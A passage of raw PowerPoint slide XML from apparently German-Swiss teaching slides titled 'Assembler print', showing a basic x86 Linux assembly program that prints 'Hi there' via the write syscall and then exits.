                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRP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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned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int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rgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" sz="2400" b="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>4			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>len</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" smtClean="0"/>
              <a:t>0x80			// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="2400" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>invoke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syscall</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="2400" b="1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3988" y="0"/>
            <a:ext cx="5545137" cy="917575"/>
          </a:xfrm>
        </p:spPr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: Assembler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>print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36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764704"/>
            <a:ext cx="8229600" cy="5616624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t> print.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF8400"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'Hi there',0xa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unsigned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int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len</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1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/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>4			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0606"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ecx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="F70991"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/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>
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>edx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t>			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0"/>
              <a:t> 0x80			</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="140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CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>, 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>, 0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> 0x80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH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3988" y="0"/>
            <a:ext cx="5545137" cy="917575"/>
          </a:xfrm>
        </p:spPr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: Assembler print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64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764704"/>
            <a:ext cx="8229600" cy="5616624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1600" b="1" dirty="0"/>
              <a:t> print.asm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF8400"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t>db</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF8400"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 'Hi there',0xa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>section</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t> .</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>text</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:endParaRPr lang="de-CH" sz="1400" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" smtClean="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0" err="1"/>
              <a:t>start</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1400" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="de-CH" sz="1800" b="1" dirty="0"/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; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>write</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-CH" sz="1800" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int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fd</a:t>
            </a:r>
            <a:r>
